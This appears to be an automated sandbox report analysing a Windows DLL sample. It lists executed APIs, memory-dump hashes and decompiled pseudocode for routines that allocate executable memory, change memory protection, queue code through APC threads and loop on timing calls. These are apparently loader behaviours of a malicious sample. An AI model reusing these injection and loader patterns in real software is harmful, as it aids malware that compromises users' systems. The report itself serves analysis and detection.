                                                                                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,0000079C,00003000,00000040,0000079C,6E271E18), ref: 6E272480
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,6E271E7C), ref: 6E2724B7
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00013F51,00003000,00000040), ref: 6E272517
                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E27254D
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E1F0000,00000000,00000004,6E2723A2), ref: 6E272652
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E1F0000,00001000,00000004,6E2723A2), ref: 6E272679
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2723A2), ref: 6E272746
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2723A2,?), ref: 6E27279C
                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2727B8
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605439378.000000006E271000.00000040.00020000.sdmp, Offset: 6E271000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2574235972-0
                                                                                                                                                                                                                                                                    • Opcode ID: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                                    • Instruction ID: f17b0aec824730e599b8e1a80d803f161a2cfee727357e17c12446058763471d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7D1AEB66002869FDF11CF54C880F517BA6FF48710B0A45A4EE0AAF75BE771B850DB62
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: U$w
                                                                                                                                                                                                                                                                    • API String ID: 0-2864656496
                                                                                                                                                                                                                                                                    • Opcode ID: f6137510c1b84919be11dd41c800458e76e4959f0b96b404e5c2900d77877ffd
                                                                                                                                                                                                                                                                    • Instruction ID: f3736ac717a6777f385770dcbb17c6b43ff4bc67f096f344186f6bf0c0cf37b1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6137510c1b84919be11dd41c800458e76e4959f0b96b404e5c2900d77877ffd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FA2A1B15087758FCB44CF6DC494A5ABBE3BB8A324F14462EE498C7391E2B5990CCF61
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                                                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                                                    				char _t9;
                                                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                                    				_t9 = _a8;
                                                                                                                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                                                                                    					_t10 = InterlockedDecrement(0x6e1f4188);
                                                                                                                                                                                                                                                                    					__eflags = _t10;
                                                                                                                                                                                                                                                                    					if(_t10 == 0) {
                                                                                                                                                                                                                                                                    						__eflags =  *0x6e1f418c;
                                                                                                                                                                                                                                                                    						if( *0x6e1f418c != 0) {
                                                                                                                                                                                                                                                                    							_t36 = 0x2328;
                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                    								SleepEx(0x64, 1);
                                                                                                                                                                                                                                                                    								__eflags =  *0x6e1f4198;
                                                                                                                                                                                                                                                                    								if( *0x6e1f4198 == 0) {
                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                                                                    								__eflags = _t36;
                                                                                                                                                                                                                                                                    								if(_t36 > 0) {
                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							CloseHandle( *0x6e1f418c);
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    						HeapDestroy( *0x6e1f4190);
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					if(_t9 == 1 && InterlockedIncrement(0x6e1f4188) == 1) {
                                                                                                                                                                                                                                                                    						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                                                    						_t41 = _t18;
                                                                                                                                                                                                                                                                    						 *0x6e1f4190 = _t18;
                                                                                                                                                                                                                                                                    						if(_t18 == 0) {
                                                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                    							 *0x6e1f41b0 = _a4;
                                                                                                                                                                                                                                                                    							asm("lock xadd [eax], edi");
                                                                                                                                                                                                                                                                    							_push( &_a8);
                                                                                                                                                                                                                                                                    							_t23 = E6E1F1CA4(E6E1F1D32, E6E1F1EE0(_a12, 1, 0x6e1f4198, _t41));
                                                                                                                                                                                                                                                                    							 *0x6e1f418c = _t23;
                                                                                                                                                                                                                                                                    							if(_t23 == 0) {
                                                                                                                                                                                                                                                                    								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                    0x6e1f1e07
                                                                                                                                                                                                                                                                    0x6e1f1e13
                                                                                                                                                                                                                                                                    0x6e1f1e15
                                                                                                                                                                                                                                                                    0x6e1f1e18
                                                                                                                                                                                                                                                                    0x6e1f1e8e
                                                                                                                                                                                                                                                                    0x6e1f1e94
                                                                                                                                                                                                                                                                    0x6e1f1e96
                                                                                                                                                                                                                                                                    0x6e1f1e98
                                                                                                                                                                                                                                                                    0x6e1f1e9e
                                                                                                                                                                                                                                                                    0x6e1f1ea0
                                                                                                                                                                                                                                                                    0x6e1f1ea5
                                                                                                                                                                                                                                                                    0x6e1f1ea8
                                                                                                                                                                                                                                                                    0x6e1f1eb3
                                                                                                                                                                                                                                                                    0x6e1f1eb5
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1eb7
                                                                                                                                                                                                                                                                    0x6e1f1eba
                                                                                                                                                                                                                                                                    0x6e1f1ebc
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1ebc
                                                                                                                                                                                                                                                                    0x6e1f1ec4
                                                                                                                                                                                                                                                                    0x6e1f1ec4
                                                                                                                                                                                                                                                                    0x6e1f1ed0
                                                                                                                                                                                                                                                                    0x6e1f1ed0
                                                                                                                                                                                                                                                                    0x6e1f1e1a
                                                                                                                                                                                                                                                                    0x6e1f1e1b
                                                                                                                                                                                                                                                                    0x6e1f1e3b
                                                                                                                                                                                                                                                                    0x6e1f1e41
                                                                                                                                                                                                                                                                    0x6e1f1e43
                                                                                                                                                                                                                                                                    0x6e1f1e48
                                                                                                                                                                                                                                                                    0x6e1f1e84
                                                                                                                                                                                                                                                                    0x6e1f1e84
                                                                                                                                                                                                                                                                    0x6e1f1e4a
                                                                                                                                                                                                                                                                    0x6e1f1e52
                                                                                                                                                                                                                                                                    0x6e1f1e59
                                                                                                                                                                                                                                                                    0x6e1f1e63
                                                                                                                                                                                                                                                                    0x6e1f1e6f
                                                                                                                                                                                                                                                                    0x6e1f1e76
                                                                                                                                                                                                                                                                    0x6e1f1e7b
                                                                                                                                                                                                                                                                    0x6e1f1e80
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1e80
                                                                                                                                                                                                                                                                    0x6e1f1e7b
                                                                                                                                                                                                                                                                    0x6e1f1e48
                                                                                                                                                                                                                                                                    0x6e1f1e1b
                                                                                                                                                                                                                                                                    0x6e1f1edd

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(6E1F4188), ref: 6E1F1E26
                                                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1F1E3B
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1CA4: CreateThread.KERNELBASE ref: 6E1F1CBB
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1F1CD0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1CA4: GetLastError.KERNEL32(00000000), ref: 6E1F1CDB
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1F1CE5
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1CA4: CloseHandle.KERNEL32(00000000), ref: 6E1F1CEC
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1CA4: SetLastError.KERNEL32(00000000), ref: 6E1F1CF5
                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(6E1F4188), ref: 6E1F1E8E
                                                                                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 6E1F1EA8
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 6E1F1EC4
                                                                                                                                                                                                                                                                    • HeapDestroy.KERNEL32 ref: 6E1F1ED0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605070540.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605056165.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605084485.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605091636.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605100957.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2110400756-0
                                                                                                                                                                                                                                                                    • Opcode ID: ab05ee6c0a839d323511b5c36207824ea6bba087649962825879c5fb6501bd90
                                                                                                                                                                                                                                                                    • Instruction ID: 551350bd531e1a2d0194a8323344ff5a369e529fe6c73bae15d3f4b2d566beb7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab05ee6c0a839d323511b5c36207824ea6bba087649962825879c5fb6501bd90
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E21C9B1B04605EFDB41CFD9DD5894A77E8F7663607508425E506D3142D3309987BBD0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                    			E6E1F1CA4(long _a4, DWORD* _a12) {
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v0;
                                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                                    				long _t6;
                                                                                                                                                                                                                                                                    				long _t11;
                                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1f41cc, 0, _a12); // executed
                                                                                                                                                                                                                                                                    				_t13 = _t4;
                                                                                                                                                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                                                                                                                                                    					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                                                                                                                    					if(_t6 == 0) {
                                                                                                                                                                                                                                                                    						_t11 = GetLastError();
                                                                                                                                                                                                                                                                    						TerminateThread(_t13, _t11);
                                                                                                                                                                                                                                                                    						CloseHandle(_t13);
                                                                                                                                                                                                                                                                    						_t13 = 0;
                                                                                                                                                                                                                                                                    						SetLastError(_t11);
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                    0x6e1f1cbb
                                                                                                                                                                                                                                                                    0x6e1f1cc1
                                                                                                                                                                                                                                                                    0x6e1f1cc5
                                                                                                                                                                                                                                                                    0x6e1f1cd0
                                                                                                                                                                                                                                                                    0x6e1f1cd8
                                                                                                                                                                                                                                                                    0x6e1f1ce1
                                                                                                                                                                                                                                                                    0x6e1f1ce5
                                                                                                                                                                                                                                                                    0x6e1f1cec
                                                                                                                                                                                                                                                                    0x6e1f1cf3
                                                                                                                                                                                                                                                                    0x6e1f1cf5
                                                                                                                                                                                                                                                                    0x6e1f1cfb
                                                                                                                                                                                                                                                                    0x6e1f1cd8
                                                                                                                                                                                                                                                                    0x6e1f1cff

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE ref: 6E1F1CBB
                                                                                                                                                                                                                                                                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1F1CD0
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 6E1F1CDB
                                                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 6E1F1CE5
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6E1F1CEC
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 6E1F1CF5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605070540.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605056165.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605084485.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605091636.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605100957.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3832013932-0
                                                                                                                                                                                                                                                                    • Opcode ID: b3752b95b14f5266fb0ddb999038e68682290afff15a99d6490e2585fc295bc2
                                                                                                                                                                                                                                                                    • Instruction ID: 39d0650554949e56baa319c98599fd3300d8f055ce89a408ba358af6c07601f0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3752b95b14f5266fb0ddb999038e68682290afff15a99d6490e2585fc295bc2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F01276205E21BBDB125BA0AC0CF5F7FE9FB0A751F008405F60791151C7218817BBEA
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3136044242-0
                                                                                                                                                                                                                                                                    • Opcode ID: 266bd8c67d8b8a25e08ebad9d8d9fef55d4240af36dd71951b5b26b7bbd76e98
                                                                                                                                                                                                                                                                    • Instruction ID: 4d765f2ace651ee4fdc93cee81dca30f388468670c158b5a3736813278213ce8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 266bd8c67d8b8a25e08ebad9d8d9fef55d4240af36dd71951b5b26b7bbd76e98
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC215EF190163EEBDF654A95CC40EAF3B7BDB85B95B214625FC145B690C7308E428FA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __RTC_Initialize.LIBCMT ref: 6E237387
                                                                                                                                                                                                                                                                      • Part of subcall function 6E237BA4: RtlInitializeSListHead.NTDLL(6E27C780), ref: 6E237BA9
                                                                                                                                                                                                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E2373F1
                                                                                                                                                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 6E23743B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                                    • String ID: y#n
                                                                                                                                                                                                                                                                    • API String ID: 2097537958-1692166551
                                                                                                                                                                                                                                                                    • Opcode ID: faf5295c1622196ac71b576df67fcae0100edd1d96b8c6bd83ab9e8e9e1e7280
                                                                                                                                                                                                                                                                    • Instruction ID: 15b2e55c67bfbeb6cadb9e5c293cfe59c448b8e5c825cbb3d2de61b1e9396fe4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: faf5295c1622196ac71b576df67fcae0100edd1d96b8c6bd83ab9e8e9e1e7280
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F021ACBA50423FDBDF04ABF498197DE7B775B0672AF304859D9456A2C0CF611051CE61
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 6E241D07
                                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E241D75
                                                                                                                                                                                                                                                                      • Part of subcall function 6E241C1A: WideCharToMultiByte.KERNEL32(?,00000000,6E23F667,00000000,00000001,6E23F5F6,6E243EDB,?,6E23F667,?,00000000,?,6E243C4A,0000FDE9,00000000,?), ref: 6E241CBC
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D6C4: RtlAllocateHeap.NTDLL(00000000,00000001,6E270094), ref: 6E23D6F6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E241D66
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2560199156-0
                                                                                                                                                                                                                                                                    • Opcode ID: 613efe40988e3650dba4536af530b685d37be180a8cf0ac8345b244d5315e144
                                                                                                                                                                                                                                                                    • Instruction ID: afd803a331d4f18e2da122ef2bf2cb91ba2c1eaff53cc328535c149e280e7b38
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 613efe40988e3650dba4536af530b685d37be180a8cf0ac8345b244d5315e144
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D001D8E2601A2BFB672965F6CD88CBF396FCDC3D953100528B918C2100EA50CC9585B1
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetConsoleCP.KERNELBASE(00000000,?,00000000,?,00000000), ref: 6E234399
                                                                                                                                                                                                                                                                    • CreateSemaphoreA.KERNEL32(00000000,00000008,00000005,00000000), ref: 6E2343A7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ConsoleCreateSemaphore
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3129514459-0
                                                                                                                                                                                                                                                                    • Opcode ID: 45ed0bdcc1b6ef5e23b27a7c4ede4d24e65aad1e8961f8ffa4555b0f54571031
                                                                                                                                                                                                                                                                    • Instruction ID: 871d4b6570022d8a0f22cf6f2419d40ad78ed03bc457dcfb0410d89b45c89350
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45ed0bdcc1b6ef5e23b27a7c4ede4d24e65aad1e8961f8ffa4555b0f54571031
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9661CFB2A00A358BDF44CF58C858F653BA3B746325F19427AD85997380F7F6990DCBA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualProtectEx.KERNELBASE(000000FF,?,00000040,?), ref: 6E2335B3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9239825f99d2cbf352a5f025acb91148603ca9e2c73b8d2b5b129fc9dc4f70d4
                                                                                                                                                                                                                                                                    • Instruction ID: 5bde274960abf5af74021a377907620d7e60472df33b0653907b0a4a438c3875
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9239825f99d2cbf352a5f025acb91148603ca9e2c73b8d2b5b129fc9dc4f70d4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D71D2719005798FCF14CF6DC498AA97BE7BB46321F24825AE494C7381E2B59A0CDFA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E2409B9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: 449622bdf49c6de57c84acab351458f4a78e05e6a085d1b0b271588136038477
                                                                                                                                                                                                                                                                    • Instruction ID: bddc72d36bee3388804d88a0417074f2f184fe88000df087203a3c896b938a24
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 449622bdf49c6de57c84acab351458f4a78e05e6a085d1b0b271588136038477
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97F02B31A4563FEBFB495AE6CC04F4B375FBF92F70B104011A828A6184EB20D4C086A3
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000001,6E270094), ref: 6E23D6F6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9af5c0befce1c225c94830b2abaaa3330a6b4bd749b37bb9bed7aad717bcd01a
                                                                                                                                                                                                                                                                    • Instruction ID: e4b214df87d952cca86bc01f954a22648547ebe8cf78695b641d2f365fb29c70
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9af5c0befce1c225c94830b2abaaa3330a6b4bd749b37bb9bed7aad717bcd01a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9E0A0A624063FABEA511AE69C15F8B674FAB42BA1F710111E839A60C0CB20C8418EA1
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                                                                                                                                    			E6E1F17A7(intOrPtr _a4) {
                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                    				struct _SYSTEMTIME _v44;
                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                    				long _v52;
                                                                                                                                                                                                                                                                    				long _v56;
                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                    				long _t21;
                                                                                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                                                                                    				long _t27;
                                                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t21 = E6E1F146C();
                                                                                                                                                                                                                                                                    				_v52 = _t21;
                                                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                                                    					return _t21;
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                    					GetSystemTime( &_v44);
                                                                                                                                                                                                                                                                    					_t23 = SwitchToThread();
                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                    					_t45 = 9;
                                                                                                                                                                                                                                                                    					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                                                                                                                                                                                                                                                                    					_v56 = E6E1F15A3(0, _t54);
                                                                                                                                                                                                                                                                    					Sleep(_t54 << 5);
                                                                                                                                                                                                                                                                    					_t21 = _v56;
                                                                                                                                                                                                                                                                    				} while (_t21 == 0xc);
                                                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				_t27 = E6E1F1C12(_t45);
                                                                                                                                                                                                                                                                    				_v52 = _t27;
                                                                                                                                                                                                                                                                    				if(_t27 != 0) {
                                                                                                                                                                                                                                                                    					L16:
                                                                                                                                                                                                                                                                    					_t21 = _v52;
                                                                                                                                                                                                                                                                    					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                                    						_t21 = GetLastError();
